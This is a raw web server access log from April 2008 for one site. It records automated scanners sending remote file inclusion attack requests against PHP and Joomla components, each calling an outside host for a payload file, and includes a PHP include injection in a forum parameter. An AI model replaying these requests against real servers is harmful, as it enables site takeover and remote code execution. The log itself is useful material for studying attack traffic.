89.218.85.18 - - [30/Apr/2008:11:22:48 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:11:22:51 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:23:03 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:23:03 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:23:03 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:23:10 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:23:11 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:23:13 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:11:23:22 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [30/Apr/2008:11:23:33 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [30/Apr/2008:11:23:34 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [30/Apr/2008:11:23:34 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [30/Apr/2008:11:23:34 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:23:39 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:23:39 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:23:39 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:23:47 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:23:47 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:23:49 -0700] "GET /logs/access_071218.log//spaw_control.class.php?spaw_root=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:23:51 -0700] "GET //spaw_control.class.php?spaw_root=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:23:51 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:11:23:59 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:11:24:02 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:11:24:02 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:24:16 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.25.60 - - [30/Apr/2008:11:24:17 -0700] "GET /mobileoffice/?M=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:24:23 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
80.238.208.61 - - [30/Apr/2008:11:24:53 -0700] "GET /logs/access_071224.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:24:54 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:24:58 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.3 - - [30/Apr/2008:11:25:17 -0700] "GET /plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:11:25:52 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:11:25:54 -0700] "GET /logs/access_080228.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:11:25:57 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:11:25:58 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:26:26 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:26:26 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:26:33 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:11:26:35 -0700] "GET /logs/access_080315.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:26:48 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:26:53 -0700] "GET /logs/access.log/index.php?id=&lang=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:26:54 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:11:27:07 -0700] "GET /logs/access_080210.log/config.inc.php?path_escape=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:11:27:08 -0700] "GET /logs/access_080218.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:11:27:08 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [30/Apr/2008:11:27:08 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.161.77 - - [30/Apr/2008:11:27:11 -0700] "GET //trans/trans.php?trans=eng&page=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:11:27:11 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.161.77 - - [30/Apr/2008:11:27:11 -0700] "GET /logs//trans/trans.php?trans=eng&page=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:11:27:12 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:27:17 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:27:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:27:19 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:27:41 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:27:42 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:27:47 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:27:47 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:27:49 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:27:49 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:11:28:30 -0700] "GET /logs/access_080108.log/component/com_events/includes/comutils.php?&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:11:28:31 -0700] "GET /component/com_events/includes/comutils.php?&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:11:28:31 -0700] "GET /logs/component/com_events/includes/comutils.php?&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:11:28:32 -0700] "GET /logs/access_080228.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:11:28:37 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:11:28:38 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:28:44 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:28:57 -0700] "GET //spaw_control.class.php?spaw_root=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:28:58 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:29:03 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:29:04 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:11:29:08 -0700] "GET /logs/access_080227.log/config.inc.php?path_escape=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:11:29:21 -0700] "GET /logs/access_080315.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:29:35 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:29:35 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:29:51 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:29:52 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:29:53 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:30:19 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:30:19 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:30:29 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:11:30:41 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:11:30:41 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:11:30:52 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:11:30:56 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:31:12 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:31:12 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:31:27 -0700] "GET /logs/access_080121.log//components/com_minibb/bb_plugins.php?absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:31:27 -0700] "GET //components/com_minibb/bb_plugins.php?absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:31:27 -0700] "GET /logs//components/com_minibb/bb_plugins.php?absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.123 - - [30/Apr/2008:11:31:44 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.141.117.79 - - [30/Apr/2008:11:31:47 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.123 - - [30/Apr/2008:11:31:48 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [30/Apr/2008:11:31:49 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:32:07 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:32:08 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:32:09 -0700] "GET /logs/access_080116.log/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:32:12 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:32:14 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:32:15 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:32:15 -0700] "GET //main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:32:18 -0700] "GET /logs//main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:32:20 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:32:35 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.216.33 - - [30/Apr/2008:11:33:19 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://glycol.ca/languages/.../test2.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
66.70.216.33 - - [30/Apr/2008:11:33:19 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://glycol.ca/languages/.../test2.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:11:33:34 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:11:33:36 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.246.51.45 - - [30/Apr/2008:11:34:01 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [30/Apr/2008:11:34:05 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [30/Apr/2008:11:34:06 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [30/Apr/2008:11:34:07 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:34:28 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:34:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:11:34:44 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
